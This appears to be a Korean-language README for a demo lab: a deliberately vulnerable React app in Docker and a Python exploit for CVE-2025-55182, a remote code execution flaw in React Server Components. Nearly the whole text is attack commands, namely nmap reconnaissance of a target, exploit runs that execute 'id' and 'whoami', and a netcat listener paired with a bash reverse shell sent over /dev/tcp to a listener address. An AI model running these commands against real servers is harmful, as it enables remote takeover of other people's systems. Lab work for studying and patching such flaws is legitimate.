
취약한 REACT 앱 (docker 컨테이너) 및 poc 코드 - 데모용
CVE-2025-55182에 대한 Python CLI 익스플로잇입니다. react-server-dom-webpack을 통해 React Server Components에서 발생하는 치명적인 RCE 취약점입니다.
docker build -t cve-2025-55182:lab .
docker run -d -p 3000:3000 --name cve-2025-55182-vuln cve-2025-55182:lab
nmap --script http-title -p 3000 TARGET_IP
nmap --script http-headers -p 3000 TARGET_IP
## 취약점 확인
python3 poc.py --ip TARGET_IP --port 3000 --post-endpoint "/formaction" --check
# 정찰
python3 poc.py --ip TARGET_IP --port 3000 --post-endpoint "/formaction" --cmd "id"
python3 poc.py --ip TARGET_IP --port 3000 --post-endpoint "/formaction" --cmd "whoami" --no-ssl-verify
# 리버스 셸
nc -nlvp 4444
python3 poc.py --ip TARGET_IP --port 3000 --cmd 'bash -c '\''bash -i >& /dev/tcp/LISTENER_IP/4444 0>&1'\'''